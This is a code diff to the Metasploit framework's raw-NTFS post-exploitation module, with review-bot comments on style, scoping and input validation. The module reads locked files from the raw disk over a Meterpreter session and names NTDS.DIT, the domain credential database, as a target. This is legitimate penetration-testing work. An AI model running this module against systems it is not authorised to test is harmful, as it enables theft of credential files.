diff --git a/lib/rex/parser/fs/ntfs.rb b/lib/rex/parser/fs/ntfs.rb
index 1a35188e63..eacc69a6b7 100644
--- a/lib/rex/parser/fs/ntfs.rb
+++ b/lib/rex/parser/fs/ntfs.rb
@@ -236,7 +236,7 @@ module Rex
 def file(path)
 repertory = mft_record_from_mft_num(5)
 index_entry = {}
- for r in path.split('\\')
+ path.split('\\').each do |r|
 attributes = mft_record_attribute(repertory)
 index = index_list_from_attributes(attributes)
 unless index.key?(r)
diff --git a/modules/post/windows/gather/file_in_raw_ntfs.rb b/modules/post/windows/gather/file_in_raw_ntfs.rb
index 702bb326ec..c8187ac31b 100644
--- a/modules/post/windows/gather/file_in_raw_ntfs.rb
+++ b/modules/post/windows/gather/file_in_raw_ntfs.rb
@@ -3,26 +3,27 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
+require 'rex/parser/fs/ntfs'
+
 class Metasploit3 < Msf::Post
 include Msf::Post::Windows::Priv
- require "rex/parser/fs/ntfs"
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'Windows File Gathering In Raw NTFS',
- 'Description' => %q{
+ 'Description' => %q(
 This module gather file using the raw NTFS device, bypassing some Windows restriction.
 Gather file from disk bypassing restriction like already open file with write right lock.
- Can be used to retreive file like NTDS.DIT
- },
+ Can be used to retreive file like NTDS.DIT),
 'License' => 'MSF_LICENSE',
 'Platform' => ['win'],
 'SessionTypes' => ['meterpreter'],
- 'Author' => ['Danil Bazin '], #@danilbaz
+ 'Author' => ['Danil Bazin '], # @danilbaz
 'References' => [ [ 'URL', 'http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/' ] ]
 ))
+
 register_options(
 [
 OptString.new('FILE_PATH', [true, 'The FILE_PATH to retreive from the Volume raw device', nil])
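Review bot: Replacing `for` with `each` narrows the scope of `r` to the block, so any statement later in `file` that read the loop variable after the loop would now raise NameError; the rest of the method body lies past the end of this hunk and should be checked for such a use before merge. Inside the loop the behaviour is unchanged. Note also that `path.split('\\')` keeps leading and embedded empty segments (a path starting with a backslash, or containing two in a row), so `index.key?(r)` is then evaluated for an empty name; if such paths should be rejected as malformed rather than fall into the not-found branch, a one-line guard at the top of the block, `raise ArgumentError, 'empty path component' if r.empty?`, makes that explicit.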
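Review bot: The rewritten Description line `Can be used to retreive file like NTDS.DIT),` keeps the misspelling "retreive", and the same misspelling sits in the FILE_PATH option text at the end of the hunk; both strings are shown to operators by `info`, so correct them while the block is being touched: `Can be used to retrieve files like NTDS.DIT),` and `'The FILE_PATH to retrieve from the Volume raw device'`. The first two description sentences are ungrammatical as well ("This module gather file", "Gather file from disk bypassing restriction"); suggested wording: "This module gathers a file through the raw NTFS device, bypassing some Windows restrictions, such as a write lock held on an already open file." Moving the `require` out of the class body to the top of the file is the right fix.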
@@ -32,46 +33,46 @@ class Metasploit3 < Msf::Post
 def run
 winver = sysinfo["OS"]
- if winver =~ /2000/i
- print_error("Module not valid for Windows 2000")
- return
- end
-
- unless is_admin?
- print_error("You don't have enough privileges")
- return
- end
+ fail_with(Exploit::Failure::NoTarget, 'Module not valid for Windows 2000') if winver =~ /2000/
+ fail_with(Exploit::Failure::NoAccess, 'You don\'t have administrative privileges') unless is_admin?
 file_path = datastore['FILE_PATH']
 r = client.railgun.kernel32.GetFileAttributesA(file_path)
 if r['GetLastError'] != 0
- print_error("The file does not exist, use file format C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts")
- return nil
+ fail_with(
+ Exploit::Failure::BadConfig,
+ 'The file does not exist, use file format C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts'
+ )
 end
 drive = file_path[0, 2]
- r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}", "GENERIC_READ", "FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE",
- nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
+ r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}",
+ 'GENERIC_READ',
+ 'FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE',
+ nil,
+ 'OPEN_EXISTING',
+ 'FILE_FLAG_WRITE_THROUGH',
+ 0)
 if r['GetLastError'] != 0
- print_error("Error opening #{drive} GetLastError=#{r['ErrorMessage']}")
- return nil
+ fail_with(
+ Exploit::Failure::Unknown,
+ "Error opening #{drive}. 
Windows Error Code: #{r['GetLastError']} - #{r['ErrorMessage']}")
 end
+
 @handle = r['return']
 print_status("Successfuly opened #{drive}")
 begin
 fs = Rex::Parser::NTFS.new(self)
- print_status("Trying gather #{file_path}")
+ print_status("Trying to gather #{file_path}")
 path = file_path[3, file_path.length - 3]
 data = fs.file(path)
 file_name = file_path.split("\\")[-1]
 stored_path = store_loot("windows.file", 'application/octet-stream', session, data, file_name, "Windows file")
 print_good("Saving file : #{stored_path}")
- rescue ::Exception => e
- print_error("Post failed : #{e.backtrace}")
 ensure
 client.railgun.kernel32.CloseHandle(@handle)
 end
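Review bot: The new BadConfig branch tells the operator to use the `C:\\Windows\\...` form, but nothing enforces it: `GetFileAttributesA` also succeeds for a relative path or a UNC path, after which the unchanged `drive = file_path[0, 2]` and `file_path[3, file_path.length - 3]` lines open `\\.\` followed by two arbitrary characters and pass a truncated path to the parser. Add a shape check beside the existence check, e.g. `fail_with(Exploit::Failure::BadConfig, 'FILE_PATH must be an absolute path such as C:\\Windows\\System32\\drivers\\etc\\hosts') unless file_path =~ /\A[A-Za-z]:\\/`. Removing `rescue ::Exception` is correct, and the `ensure` still closes the volume handle on every exit path once `@handle` has been set.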